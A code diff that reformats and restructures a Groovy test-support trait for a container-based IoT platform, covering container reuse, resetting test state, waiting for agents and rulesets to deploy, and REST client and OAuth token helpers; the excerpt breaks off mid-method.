+    // Reset and start clock in case any previous tests stopped/modified it (pseudo clock is static so shared between tests)
+    TimerService.Clock.PSEUDO.reset()
+    TimerService.Clock.PSEUDO.advanceTime(-1, TimeUnit.MILLISECONDS) // Put time back so attribute events with the same timestamp as provisioned assets don't get rejected
+
+    if (container != null) {
+      // Compare config and services
+      def configsMatch = false
+      def servicesMatch = false
+      def currentConfig = container.getConfig()
+      if (Objects.equals(currentConfig, config)) {
+        configsMatch = true
+      } else {
+        if (currentConfig.size() == config.size()) {
+          configsMatch = currentConfig.entrySet().stream().allMatch{entry ->
+            // ignore webserver port config
+            if (entry.key == OR_WEBSERVER_LISTEN_PORT) {
+              return true
+            }
+            entry.value == config.get(entry.key)
+          }
+        }
+      }
+
+      def currentServiceList = new ArrayList<ContainerService>()
+      currentServiceList.addAll(container.getServices())
+      currentServiceList.removeIf{
+        it instanceof Handler
+      } // Exclude log handlers as they are loaded by JUL
+      def serviceList = services.asList()
+      if (serviceList.size() == currentServiceList.size()) {
+        servicesMatch = IntStream.range(0, serviceList.size()).allMatch { i ->
+          serviceList.get(i).class == currentServiceList.get(i).class
+        }
+      }
+
+      if (configsMatch && servicesMatch) {
+        try {
+          long startTime = System.currentTimeMillis()
+          LOG.info("Services and config matches already running container so checking state")
+          def counter = 0
+
+          // Reset users - just delete ones that weren't there before (if tests change user roles etc. then the test should force stop the container in cleanup)
+          if (container.hasService(ManagerIdentityService.class)) {
+            def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
+            def users = identityProvider.queryUsers()
+            def newUsers = users.findAll {user ->
+              !TestFixture.users.any {previousUser ->
+                previousUser.id == user.id
+              }
+            }
+            if (!TestFixture.users.every {previousUser ->
+                      users.any {user ->
+                        user.id == previousUser.id
+                      }
+                    }) {
+              throw new IllegalStateException("Users have been modified so cannot do simple purge")
+            }
+
+            LOG.info("Purging ${newUsers.size()} new user(s)")
+            newUsers.forEach {user ->
+              // Never delete the master admin user
+              if (user.getUsername() != MASTER_REALM_ADMIN_USER && user.getRealm() != MASTER_REALM) {
+                identityProvider.deleteUser(user.realm, user.id)
+              }
+            }
+          }
+
+          // Reset gateway connections
+          if (container.hasService(GatewayClientService.class)) {
+            def gatewayClientService = container.getService(GatewayClientService.class)
+            def gatewayConnections = getGatewayConnections()
+            LOG.info("Purging ${gatewayConnections.size()} gateway connection(s)")
+            gatewayClientService.deleteConnections(gatewayConnections.stream().map {
+              it.localRealm
+            }.collect(Collectors.toList()))
+          }
+
+          // Reset rulesets
+          if (container.hasService(RulesetStorageService.class) && container.hasService(RulesService.class)) {
+            def rulesService = container.getService(RulesService.class)
+            def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+            def assetEngines = new HashSet<RulesEngine>(rulesService.assetEngines.values())
+            LOG.info("Purging ${assetEngines.size()} asset engine(s)")
+            assetEngines.forEach {
+              it.stop()
+              rulesService.assetEngines.values().remove(it)
+            }
+            def assetRulesets = getRulesets(AssetRuleset.class)
+            assetRulesets.forEach{
+              rulesetStorageService.delete(AssetRuleset.class, it.id)
+            }
+
+            def realmEngines = new HashSet<RulesEngine>(rulesService.realmEngines.values())
+            LOG.info("Purging ${realmEngines.size()} realm engine(s)")
+            realmEngines.forEach {
+              it.stop()
+              rulesService.realmEngines.values().remove(it)
+            }
+            def realmRulesets = getRulesets(RealmRuleset.class)
+            realmRulesets.forEach{
+              rulesetStorageService.delete(RealmRuleset.class, it.id)
+            }
+
+            def globalEngine = rulesService.globalEngine.get()
+            if (globalEngine != null) {
+              LOG.info("Purging global engine")
+              globalEngine.stop()
+              rulesService.globalEngine.set(null)
+            }
+            def globalRulesets = getRulesets(GlobalRuleset.class)
+            globalRulesets.forEach{
+              rulesetStorageService.delete(GlobalRuleset.class, it.id)
+            }
+          }
+
+          // Wait for system to settle down
+          def assetProcessingService = container.hasService(AssetProcessingService.class) ? container.getService(AssetProcessingService.class) : null
+          if (assetProcessingService != null) {
+            LOG.info("Waiting for the system to settle down")
+            def j = 0
+            while (j < 100 && !noEventProcessedIn(assetProcessingService, 300)) {
+              Thread.sleep(100)
+              j++
+            }
+          }
+
+          // Reset assets
+          if (container.hasService(AgentService.class) && container.hasService(AssetStorageService.class)) {
+            def currentAssets = getAssets().collect { it.getId() }
+            def assetStorageService = container.getService(AssetStorageService.class)
+
+            if (!currentAssets.isEmpty()) {
+              LOG.info("Purging ${currentAssets.size()} asset(s)")
+              assetStorageService.delete(currentAssets, true)
+            }
+
+            // Wait for all assets to be unlinked from protocols
+            def agentsRemoved = false
+            while (!agentsRemoved) {
+              if (counter++ > 100) {
+                throw new IllegalStateException("Failed to purge agents")
+              }
+              agentsRemoved = container.getService(AgentService.class).agents.isEmpty()
+              Thread.sleep(100)
+            }
+
+            if (!TestFixture.assets.isEmpty()) {
+              // Redeploy agents first except for agents under an asset parent then merge those first
+              def agents = TestFixture.assets.stream().filter {
+                it instanceof Agent
+              }.toList()
+              def assets = new ArrayList<>(TestFixture.assets.stream().filter {
+                !(it instanceof Agent)
+              }.toList())
+              LOG.info("Re-inserting ${agents.size()} agent(s)")
+              agents.forEach { a ->
+                a.version = 0
+
+                if (a.path.size() > 1) {
+                  for (final def assetId in a.path) {
+                    if (assetId == a.id) {
+                      continue
+                    }
+                    def ancestorIndex = assets.findIndexOf { it.id == assetId }
+                    def ancestor = ancestorIndex >= 0 ? assets.remove(ancestorIndex) : null
+                    if (ancestor != null) {
+                      assetStorageService.merge(ancestor, true)
+                    }
+                  }
+                }
+
+                assetStorageService.merge(a, true)
+              }
+
+              counter = 0
+              def agentsDeployed = false
+              while (!agentsDeployed) {
+                if (counter++ > 100) {
+                  throw new IllegalStateException("Failed to deploy agents")
+                }
+                agentsDeployed = container.getService(AgentService.class).agents.size() == agents.size()
+                Thread.sleep(100)
+              }
+
+              LOG.info("Re-inserting ${assets.size()} asset(s)")
+              assets.forEach { a ->
+                a.version = 0
+                assetStorageService.merge(a, true)
+              }
+            }
+            if (!TestFixture.userAssets.isEmpty()) {
+              LOG.info("Re-linking ${TestFixture.userAssets.size()} user asset(s)")
+              TestFixture.userAssets.groupBy {it.id.userId}.values().forEach { ua ->
+                assetStorageService.storeUserAssetLinks(ua)
+              }
+            }
+          }
+
+          // Re-insert rulesets (after assets have been re-inserted)
+          if (container.hasService(RulesetStorageService.class) && container.hasService(RulesService.class)) {
+            def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+            if (!TestFixture.assetRulesets.isEmpty()) {
+              LOG.info("Re-inserting ${TestFixture.assetRulesets.size()} asset ruleset(s)")
+              TestFixture.assetRulesets = TestFixture.assetRulesets.stream().map {
+                it.id = null
+                it.version = 0
+                return rulesetStorageService.merge(it)
+              }.toList()
+            }
+            if (!TestFixture.realmRulesets.isEmpty()) {
+              LOG.info("Re-inserting ${TestFixture.realmRulesets.size()} realm ruleset(s)")
+              TestFixture.realmRulesets = TestFixture.realmRulesets.stream().map {
+                it.id = null
+                it.version = 0
+                return rulesetStorageService.merge(it)
+              }.toList()
+            }
+            if (!TestFixture.globalRulesets.isEmpty()) {
+              LOG.info("Re-inserting ${TestFixture.globalRulesets.size()} global ruleset(s)")
+              TestFixture.globalRulesets = TestFixture.globalRulesets.stream().map {
+                it.id = null
+                it.version = 0
+                return rulesetStorageService.merge(it)
+              }
+            }
+          }
+
+          long endTime = System.currentTimeMillis()
+          LOG.info("Container reuse took: " + (endTime - startTime) + "ms")
+        } catch (IllegalStateException e) {
+          LOG.info("Failed to clean the existing container so creating a new one", e)
+          stopContainer()
+        }
+      } else {
+        LOG.info("Request to start container with different config and/or services as already running container so restarting")
+        LOG.info("Current config = ${currentConfig}, new config = ${config}")
+        stopContainer()
+      }
     }
 
-    Logger LOG = LoggerFactory.getLogger(ContainerTrait.class)
+    if (container == null) {
+      try {
+        TestFixture.container = new Container(config, services)
+        container.startBackground()
+      } catch (Exception e) {
+        LOG.warn("Failed to start the container")
+        stopContainer()
+        throw e
+      }
 
-    Container startContainer(Map<String, String> config, Iterable<ContainerService> services) {
+      // Block until container is actually running to aid in testing but also to record some state info
+      while (!container.isRunning()) {
+        Thread.sleep(100)
+      }
 
-        // Reset and start clock in case any previous tests stopped/modified it (pseudo clock is static so shared between tests)
-        TimerService.Clock.PSEUDO.reset()
-        TimerService.Clock.PSEUDO.advanceTime(-1, TimeUnit.MILLISECONDS) // Put time back so attribute events with the same timestamp as provisioned assets don't get rejected
+      // Track rules (very basic)
+      TestFixture.globalRulesets = getRulesets(GlobalRuleset.class)
+      TestFixture.realmRulesets = getRulesets(RealmRuleset.class)
+      TestFixture.assetRulesets = getRulesets(AssetRuleset.class)
 
-        if (container != null) {
-            // Compare config and services
-            def configsMatch = false
-            def servicesMatch = false
-            def currentConfig = container.getConfig()
-            if (Objects.equals(currentConfig, config)) {
-                configsMatch = true
-            } else {
-                if (currentConfig.size() == config.size()) {
-                    configsMatch = currentConfig.entrySet().stream().allMatch{entry ->
-                        // ignore webserver port config
-                        if (entry.key == OR_WEBSERVER_LISTEN_PORT) {
-                            return true
-                        }
-                        entry.value == config.get(entry.key)
-                    }
-                }
-            }
+      // Track assets
+      TestFixture.assets = getAssets()
+      TestFixture.userAssets = getUserAssets()
 
-            def currentServiceList = new ArrayList<ContainerService>()
-            currentServiceList.addAll(container.getServices())
-            currentServiceList.removeIf{it instanceof Handler} // Exclude log handlers as they are loaded by JUL
-            def serviceList = services.asList()
-            if (serviceList.size() == currentServiceList.size()) {
-                servicesMatch = IntStream.range(0, serviceList.size()).allMatch { i ->
-                    serviceList.get(i).class == currentServiceList.get(i).class
-                }
-            }
+      // Track gateway connections
+      TestFixture.gatewayConnections = getGatewayConnections()
 
-            if (configsMatch && servicesMatch) {
-                try {
-                    long startTime = System.currentTimeMillis()
-                    LOG.info("Services and config matches already running container so checking state")
-                    def counter = 0
+      // Track users and their roles
+      TestFixture.users = getUsers()
+    }
 
-                    // Reset users - just delete ones that weren't there before (if tests change user roles etc. then the test should force stop the container in cleanup)
-                    if (container.hasService(ManagerIdentityService.class)) {
-                        def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
-                        def users = identityProvider.queryUsers()
-                        def newUsers = users.findAll {user -> !TestFixture.users.any {previousUser -> previousUser.id == user.id}}
-                        if (!TestFixture.users.every {previousUser -> users.any {user -> user.id == previousUser.id}}) {
-                            throw new IllegalStateException("Users have been modified so cannot do simple purge")
-                        }
+    // Wait for agents and rulesets to be deployed - Just a very basic way of waiting for the system to be 'initialised'
+    def agentService = container.hasService(AgentService.class) ? container.getService(AgentService.class) : null
+    def rulesService = container.hasService(RulesService.class) ? container.getService(RulesService.class) : null
+    def assetProcessingService = container.hasService(AssetProcessingService.class) ? container.getService(AssetProcessingService.class) : null
+    int i = 0
 
-                        LOG.info("Purging ${newUsers.size()} new user(s)")
-                        newUsers.forEach {user ->
-                            // Never delete the master admin user
-                            if (user.getUsername() != MASTER_REALM_ADMIN_USER && user.getRealm() != MASTER_REALM) {
-                                identityProvider.deleteUser(user.realm, user.id)
-                            }
-                        }
-                    }
-
-                    // Reset gateway connections
-                    if (container.hasService(GatewayClientService.class)) {
-                        def gatewayClientService = container.getService(GatewayClientService.class)
-                        def gatewayConnections = getGatewayConnections()
-                        LOG.info("Purging ${gatewayConnections.size()} gateway connection(s)")
-                        gatewayClientService.deleteConnections(gatewayConnections.stream().map { it.localRealm }.collect(Collectors.toList()))
-                    }
-
-                    // Reset rulesets
-                    if (container.hasService(RulesetStorageService.class) && container.hasService(RulesService.class)) {
-                        def rulesService = container.getService(RulesService.class)
-                        def rulesetStorageService = container.getService(RulesetStorageService.class)
-
-                        def assetEngines = new HashSet<RulesEngine>(rulesService.assetEngines.values())
-                        LOG.info("Purging ${assetEngines.size()} asset engine(s)")
-                        assetEngines.forEach {
-                            it.stop()
-                            rulesService.assetEngines.values().remove(it)
-                        }
-                        def assetRulesets = getRulesets(AssetRuleset.class)
-                        assetRulesets.forEach{
-                            rulesetStorageService.delete(AssetRuleset.class, it.id)
-                        }
-
-                        def realmEngines = new HashSet<RulesEngine>(rulesService.realmEngines.values())
-                        LOG.info("Purging ${realmEngines.size()} realm engine(s)")
-                        realmEngines.forEach {
-                            it.stop()
-                            rulesService.realmEngines.values().remove(it)
-                        }
-                        def realmRulesets = getRulesets(RealmRuleset.class)
-                        realmRulesets.forEach{
-                            rulesetStorageService.delete(RealmRuleset.class, it.id)
-                        }
-
-                        def globalEngine = rulesService.globalEngine.get()
-                        if (globalEngine != null) {
-                            LOG.info("Purging global engine")
-                            globalEngine.stop()
-                            rulesService.globalEngine.set(null)
-                        }
-                        def globalRulesets = getRulesets(GlobalRuleset.class)
-                        globalRulesets.forEach{
-                            rulesetStorageService.delete(GlobalRuleset.class, it.id)
-                        }
-                    }
-
-                    // Wait for system to settle down
-                    def assetProcessingService = container.hasService(AssetProcessingService.class) ? container.getService(AssetProcessingService.class) : null
-                    if (assetProcessingService != null) {
-                        LOG.info("Waiting for the system to settle down")
-                        def j=0
-                        while (j < 100 && !noEventProcessedIn(assetProcessingService, 300)) {
-                            Thread.sleep(100)
-                            j++
-                        }
-                    }
-
-                    // Reset assets
-                    if (container.hasService(AgentService.class) && container.hasService(AssetStorageService.class)) {
-                        def currentAssets = getAssets().collect { it.getId() }
-                        def assetStorageService = container.getService(AssetStorageService.class)
-
-                        if (!currentAssets.isEmpty()) {
-                            LOG.info("Purging ${currentAssets.size()} asset(s)")
-                            assetStorageService.delete(currentAssets, true)
-                        }
-
-                        // Wait for all assets to be unlinked from protocols
-                        def agentsRemoved = false
-                        while (!agentsRemoved) {
-                            if (counter++ > 100) {
-                                throw new IllegalStateException("Failed to purge agents")
-                            }
-                            agentsRemoved = container.getService(AgentService.class).agents.isEmpty()
-                            Thread.sleep(100)
-                        }
-
-                        if (!TestFixture.assets.isEmpty()) {
-                            // Redeploy agents first except for agents under an asset parent then merge those first
-                            def agents = TestFixture.assets.stream().filter { it instanceof Agent }.toList()
-                            def assets = new ArrayList<>(TestFixture.assets.stream().filter { !(it instanceof Agent) }.toList())
-                            LOG.info("Re-inserting ${agents.size()} agent(s)")
-                            agents.forEach { a ->
-                                a.version = 0
-
-                                if (a.path.size() > 1) {
-                                    for (final def assetId in a.path) {
-                                        if (assetId == a.id) {
-                                            continue
-                                        }
-                                        def ancestorIndex = assets.findIndexOf { it.id == assetId }
-                                        def ancestor = ancestorIndex >= 0 ? assets.remove(ancestorIndex) : null
-                                        if (ancestor != null) {
-                                            assetStorageService.merge(ancestor, true)
-                                        }
-                                    }
-                                }
-
-                                assetStorageService.merge(a, true)
-                            }
-
-                            counter = 0
-                            def agentsDeployed = false
-                            while (!agentsDeployed) {
-                                if (counter++ > 100) {
-                                    throw new IllegalStateException("Failed to deploy agents")
-                                }
-                                agentsDeployed = container.getService(AgentService.class).agents.size() == agents.size()
-                                Thread.sleep(100)
-                            }
-
-                            LOG.info("Re-inserting ${assets.size()} asset(s)")
-                            assets.forEach { a ->
-                                a.version = 0
-                                assetStorageService.merge(a, true)
-                            }
-                        }
-                        if (!TestFixture.userAssets.isEmpty()) {
-                            LOG.info("Re-linking ${TestFixture.userAssets.size()} user asset(s)")
-                            TestFixture.userAssets.groupBy {it.id.userId}.values().forEach { ua ->
-                                assetStorageService.storeUserAssetLinks(ua)
-                            }
-                        }
-                    }
-
-                    // Re-insert rulesets (after assets have been re-inserted)
-                    if (container.hasService(RulesetStorageService.class) && container.hasService(RulesService.class)) {
-                        def rulesetStorageService = container.getService(RulesetStorageService.class)
-
-                        if (!TestFixture.assetRulesets.isEmpty()) {
-                            LOG.info("Re-inserting ${TestFixture.assetRulesets.size()} asset ruleset(s)")
-                            TestFixture.assetRulesets = TestFixture.assetRulesets.stream().map {
-                                it.id = null
-                                it.version = 0
-                                return rulesetStorageService.merge(it)
-                            }.toList()
-                        }
-                        if (!TestFixture.realmRulesets.isEmpty()) {
-                            LOG.info("Re-inserting ${TestFixture.realmRulesets.size()} realm ruleset(s)")
-                            TestFixture.realmRulesets = TestFixture.realmRulesets.stream().map {
-                                it.id = null
-                                it.version = 0
-                                return rulesetStorageService.merge(it)
-                            }.toList()
-                        }
-                        if (!TestFixture.globalRulesets.isEmpty()) {
-                            LOG.info("Re-inserting ${TestFixture.globalRulesets.size()} global ruleset(s)")
-                            TestFixture.globalRulesets = TestFixture.globalRulesets.stream().map {
-                                it.id = null
-                                it.version = 0
-                                return rulesetStorageService.merge(it)
-                            }
-                        }
-                    }
-
-                    long endTime = System.currentTimeMillis()
-                    LOG.info("Container reuse took: " + (endTime - startTime) + "ms")
-                } catch (IllegalStateException e) {
-                    LOG.info("Failed to clean the existing container so creating a new one", e)
-                    stopContainer()
-                }
-            } else {
-                LOG.info("Request to start container with different config and/or services as already running container so restarting")
-                LOG.info("Current config = ${currentConfig}, new config = ${config}")
-                stopContainer()
-            }
-        }
-
-        if (container == null) {
-            try {
-                TestFixture.container = new Container(config, services)
-                container.startBackground()
-            } catch (Exception e) {
-                LOG.warn("Failed to start the container")
-                stopContainer()
-                throw e
-            }
-
-            // Block until container is actually running to aid in testing but also to record some state info
-            while (!container.isRunning()) {
-                Thread.sleep(100)
-            }
-
-            // Track rules (very basic)
-            TestFixture.globalRulesets = getRulesets(GlobalRuleset.class)
-            TestFixture.realmRulesets = getRulesets(RealmRuleset.class)
-            TestFixture.assetRulesets = getRulesets(AssetRuleset.class)
-
-            // Track assets
-            TestFixture.assets = getAssets()
-            TestFixture.userAssets = getUserAssets()
-
-            // Track gateway connections
-            TestFixture.gatewayConnections = getGatewayConnections()
-
-            // Track users and their roles
-            TestFixture.users = getUsers()
-        }
-
-        // Wait for agents and rulesets to be deployed - Just a very basic way of waiting for the system to be 'initialised'
-        def agentService = container.hasService(AgentService.class) ? container.getService(AgentService.class) : null
-        def rulesService = container.hasService(RulesService.class) ? container.getService(RulesService.class) : null
-        def assetProcessingService = container.hasService(AssetProcessingService.class) ? container.getService(AssetProcessingService.class) : null
-        int i=0
-
-        if (agentService != null) {
-            LOG.info("Waiting for agents to be deployed")
-            i=0
-            while (i < 100 && TestFixture.assets.stream().filter { it instanceof Agent }.any {
+    if (agentService != null) {
+      LOG.info("Waiting for agents to be deployed")
+      i = 0
+      while (i < 100 && TestFixture.assets.stream().filter { it instanceof Agent }.any {
                 def agent = agentService.agents.get(it.id)
                 if (agent == null) {
-                    return true
+                  return true
                 }
                 Protocol<?> protocolInstance = agentService.protocolInstanceMap.get(it.id)
                 if (protocolInstance == null) {
-                    return true
+                  return true
                 }
                 return !protocolInstance.agent.is(agent)
-            }) {
-                Thread.sleep(100)
-                i++
-            }
-            if (i >= 100) {
-                LOG.info("Agents didn't load correctly so stopping and starting the container")
-                stopContainer()
-                return startContainer(config, services)
-            } else {
-                LOG.info("Agents are deployed")
-            }
+              }) {
+        Thread.sleep(100)
+        i++
+      }
+      if (i >= 100) {
+        LOG.info("Agents didn't load correctly so stopping and starting the container")
+        stopContainer()
+        return startContainer(config, services)
+      } else {
+        LOG.info("Agents are deployed")
+      }
+    }
+
+    if (rulesService != null) {
+      LOG.info("Waiting for global rulesets to be deployed")
+      i = 0
+      while (i < 100 && TestFixture.globalRulesets.stream().filter {
+                it.enabled
+              }.any {
+                rulesService.globalEngine.get() == null || !rulesService.globalEngine.get().deployments.containsKey(it.id)
+              }) {
+        Thread.sleep(100)
+        i++
+      }
+      LOG.info("Global rulesets are deployed")
+
+      LOG.info("Waiting for realm rulesets to be deployed")
+      i = 0
+      while (i < 100 && TestFixture.realmRulesets.stream().filter {
+                it.enabled
+              }.any {
+                !rulesService.realmEngines.containsKey(it.realm) || !rulesService.realmEngines.get(it.realm).deployments.containsKey(it.id)
+              }) {
+        Thread.sleep(100)
+        i++
+      }
+      LOG.info("Realm rulesets are deployed")
+
+      LOG.info("Waiting for asset rulesets to be deployed")
+      i = 0
+      while (i < 100 && TestFixture.assetRulesets.stream().filter {
+                it.enabled
+              }.any {
+                !rulesService.assetEngines.containsKey(it.assetId) || !rulesService.assetEngines.get(it.assetId).deployments.containsKey(it.id)
+              }) {
+        Thread.sleep(100)
+        i++
+      }
+      LOG.info("Asset rulesets are deployed")
+    }
+
+    if (assetProcessingService != null) {
+      LOG.info("Waiting for the system to settle down")
+      def j = 0
+      while (j < 100 && !noEventProcessedIn(assetProcessingService, 300)) {
+        Thread.sleep(100)
+        j++
+      }
+    }
+
+    // Reset and start clock in case any previous tests stopped/modified it (pseudo clock is static so shared between tests)
+    TimerService.Clock.PSEUDO.reset()
+    TimerService.Clock.PSEUDO.advanceTime(10, TimeUnit.MILLISECONDS) // Advance clock so attribute events from tests will succeed (even if actual clock hasn't moved more than a millisecond)
+
+    return container
+  }
+
+  boolean noEventProcessedIn(AssetProcessingService assetProcessingService, int milliseconds) {
+    return (assetProcessingService.lastProcessedEventTimestamp> 0
+            && assetProcessingService.lastProcessedEventTimestamp + milliseconds <System.currentTimeMillis())
+  }
+
+  List<Ruleset> getRulesets(Class<? extends Ruleset> clazz) {
+    if (!container.hasService(RulesetStorageService.class)) {
+      return Collections.emptyList()
+    }
+    RulesetStorageService rulesetStorageService = container.getService(RulesetStorageService.class)
+    return rulesetStorageService.findAll(clazz, new RulesetQuery().setFullyPopulate(true))
+  }
+
+  List<RealmRuleset> getRealmRulesets() {
+    if (!container.hasService(RulesService.class)) {
+      return Collections.emptyList()
+    }
+    RulesService rulesService = container.getService(RulesService.class)
+    return rulesService.realmEngines.values().collect {
+      it.deployments.values()
+    }.flatten {
+      it.ruleset
+    }
+  }
+
+  List<AssetRuleset> getAssetRulesets() {
+    if (!container.hasService(RulesService.class)) {
+      return Collections.emptyList()
+    }
+    RulesService rulesService = container.getService(RulesService.class)
+    return rulesService.realmEngines.values().collect {
+      it.deployments.values()
+    }.flatten {
+      it.ruleset
+    }
+  }
+
+  List<Asset> getAssets() {
+    if (!container.hasService(AssetStorageService.class)) {
+      return Collections.emptyList()
+    }
+    container.getService(AssetStorageService.class).findAll(new AssetQuery())
+  }
+
+  List<UserAssetLink> getUserAssets() {
+    if (!container.hasService(AssetStorageService.class)) {
+      return Collections.emptyList()
+    }
+    return container.getService(PersistenceService.class).doReturningTransaction {
+      TypedQuery<UserAssetLink> query = it.createQuery("select ua from UserAssetLink ua", UserAssetLink.class)
+      return query.getResultList()
+    }
+  }
+
+  List<GatewayConnection> getGatewayConnections() {
+    if (!container.hasService(GatewayClientService.class)) {
+      return Collections.emptyList()
+    }
+    container.getService(GatewayClientService.class).getConnections()
+  }
+
+  List<User> getUsers() {
+    if (!container.hasService(ManagerIdentityService)) {
+      return Collections.emptyList()
+    }
+    def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
+    List<User> users = identityProvider.queryUsers()
+    return users
+  }
+
+  Container getContainer() {
+    return TestFixture.container
+  }
+
+  int getServerPort() {
+    if (container != null) {
+      return MapAccess.getInteger(container.getConfig(), OR_WEBSERVER_LISTEN_PORT, 0)
+    }
+    return 0
+  }
+
+  boolean isContainerRunning() {
+    container.running
+  }
+
+  ResteasyClient createClient(String accessToken) {
+    testClient.updateAndGet {
+      it != null ? it :
+      // Use a long timeout to make debugging a bit easier
+      WebTargetBuilder.createClient(Container.EXECUTOR, 1, 120000, null)
+    }
+  }
+
+  UriBuilder serverUri(int serverPort) {
+    UriBuilder.fromUri("")
+            .scheme("http").host("127.0.0.1").port(serverPort)
+  }
+
+  UriBuilder serverUri(boolean secure, String serverHost, int serverPort) {
+    UriBuilder.fromUri("")
+            .scheme(secure ? "https" : "http").host(serverHost).port(serverPort)
+  }
+
+  void stopContainer() {
+    try {
+      if (container != null) {
+        container.stop()
+      }
+    } catch (Exception e) {
+      LOG.warn("Failed to stop container", e)
+    } finally {
+      TestFixture.container = null
+      closeTestClient(testClient, "test JAX-RS client")
+      // Clear out the Built in JAX-RS client as the executor service it uses will be aggressively shutdown by Camel
+      closeTestClient(WebTargetBuilder.BUILT_IN_CLIENT, "built in JAX-RS client")
+    }
+  }
+
+  void closeTestClient(AtomicReference<ResteasyClient> clientReference, String clientName) {
+    try {
+      clientReference.getAndUpdate {
+        if (it != null) {
+          it.close()
         }
-
-        if (rulesService != null) {
-            LOG.info("Waiting for global rulesets to be deployed")
-            i=0
-            while (i < 100 && TestFixture.globalRulesets.stream().filter { it.enabled }.any { rulesService.globalEngine.get() == null || !rulesService.globalEngine.get().deployments.containsKey(it.id) }) {
-                Thread.sleep(100)
-                i++
-            }
-            LOG.info("Global rulesets are deployed")
-
-            LOG.info("Waiting for realm rulesets to be deployed")
-            i=0
-            while (i < 100 && TestFixture.realmRulesets.stream().filter { it.enabled }.any { !rulesService.realmEngines.containsKey(it.realm) || !rulesService.realmEngines.get(it.realm).deployments.containsKey(it.id) }) {
-                Thread.sleep(100)
-                i++
-            }
-            LOG.info("Realm rulesets are deployed")
-
-            LOG.info("Waiting for asset rulesets to be deployed")
-            i=0
-            while (i < 100 && TestFixture.assetRulesets.stream().filter { it.enabled }.any { !rulesService.assetEngines.containsKey(it.assetId) || !rulesService.assetEngines.get(it.assetId).deployments.containsKey(it.id) }) {
-                Thread.sleep(100)
-                i++
-            }
-            LOG.info("Asset rulesets are deployed")
-        }
-
-        if (assetProcessingService != null) {
-            LOG.info("Waiting for the system to settle down")
-            def j=0
-            while (j < 100 && !noEventProcessedIn(assetProcessingService, 300)) {
-                Thread.sleep(100)
-                j++
-            }
-        }
-
-        // Reset and start clock in case any previous tests stopped/modified it (pseudo clock is static so shared between tests)
-        TimerService.Clock.PSEUDO.reset()
-        TimerService.Clock.PSEUDO.advanceTime(10, TimeUnit.MILLISECONDS) // Advance clock so attribute events from tests will succeed (even if actual clock hasn't moved more than a millisecond)
-
-        return container
+        return null
+      }
+    } catch (Exception e) {
+      LOG.warn("Failed to close ${clientName}", e)
     }
+  }
 
-    boolean noEventProcessedIn(AssetProcessingService assetProcessingService, int milliseconds) {
-        return (assetProcessingService.lastProcessedEventTimestamp > 0
-            && assetProcessingService.lastProcessedEventTimestamp + milliseconds < System.currentTimeMillis())
+  ResteasyWebTarget getClientTarget(UriBuilder serverUri, String accessToken) {
+    def target = createClient(accessToken).target(serverUri)
+    if (accessToken != null) {
+      ClientRequestFilter authFilter = {context ->
+        (context as ClientRequestContext).getHeaders().putSingle(HttpHeaders.AUTHORIZATION, RequestParams.BEARER_AUTH_PREFIX + accessToken)
+      }
+      target.register(authFilter)
     }
+    return target
+  }
 
-    List<Ruleset> getRulesets(Class<? extends Ruleset> clazz) {
-        if (!container.hasService(RulesetStorageService.class)) {
-            return Collections.emptyList()
-        }
-        RulesetStorageService rulesetStorageService = container.getService(RulesetStorageService.class)
-        return rulesetStorageService.findAll(clazz, new RulesetQuery().setFullyPopulate(true))
-    }
+  ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm) {
+    getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm), null)
+  }
 
-    List<RealmRuleset> getRealmRulesets() {
-        if (!container.hasService(RulesService.class)) {
-            return Collections.emptyList()
-        }
-        RulesService rulesService = container.getService(RulesService.class)
-        return rulesService.realmEngines.values().collect {it.deployments.values()}.flatten {it.ruleset}
-    }
+  ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm, String accessToken) {
+    getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm), accessToken)
+  }
 
-    List<AssetRuleset> getAssetRulesets() {
-        if (!container.hasService(RulesService.class)) {
-            return Collections.emptyList()
-        }
-        RulesService rulesService = container.getService(RulesService.class)
-        return rulesService.realmEngines.values().collect {it.deployments.values()}.flatten {it.ruleset}
-    }
+  ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm, String path, String accessToken) {
+    getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm).path(path), null)
+  }
 
-    List<Asset> getAssets() {
-        if (!container.hasService(AssetStorageService.class)) {
-            return Collections.emptyList()
-        }
-        container.getService(AssetStorageService.class).findAll(new AssetQuery())
-    }
+  int findEphemeralPort() {
+    ServerSocket socket = new ServerSocket(0, 0, Inet4Address.getLoopbackAddress())
+    socket.close()
+    int port = socket.getLocalPort()
+    return port
+  }
 
-    List<UserAssetLink> getUserAssets() {
-        if (!container.hasService(AssetStorageService.class)) {
-            return Collections.emptyList()
-        }
-        return container.getService(PersistenceService.class).doReturningTransaction {
-            TypedQuery<UserAssetLink> query = it.createQuery("select ua from UserAssetLink ua", UserAssetLink.class)
-            return query.getResultList()
-        }
-    }
+  String authenticate(Container container, String realm, String clientId, String username, String password) {
+    container.getService(WebService.class).getBearerToken(
+            new OAuthPasswordGrant(
+                    ((KeycloakIdentityProvider)container.getService(ManagerIdentityService.class).getIdentityProvider()).getTokenUri(realm).toString(),
+                    clientId,
+                    null,
+                    null,
+                    username,
+                    password)).get(10, TimeUnit.SECONDS)
+  }
 
-    List<GatewayConnection> getGatewayConnections() {
-        if (!container.hasService(GatewayClientService.class)) {
-            return Collections.emptyList()
-        }
-        container.getService(GatewayClientService.class).getConnections()
-    }
+  String authenticate(Container container, String realm, String clientId, String clientSecret) {
+    container.getService(WebService.class).getBearerToken(
+            new OAuthClientCredentialsGrant(
+                    ((KeycloakIdentityProvider)container.getService(ManagerIdentityService.class).getIdentityProvider()).getTokenUri(realm).toString(),
+                    clientId,
+                    clientSecret,
+                    null)).get(10, TimeUnit.SECONDS)
+  }
 
-    List<User> getUsers() {
-        if (!container.hasService(ManagerIdentityService)) {
-            return Collections.emptyList()
-        }
-        def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
-        List<User> users = identityProvider.queryUsers()
-        return users
-    }
+  /**
+   * Makes a call to a remote OpenRemote manager to retrieve an access token for a given user
+   * */
+  String authenticate(boolean secure,
+          String host,
+          String realm,
+          String clientId,
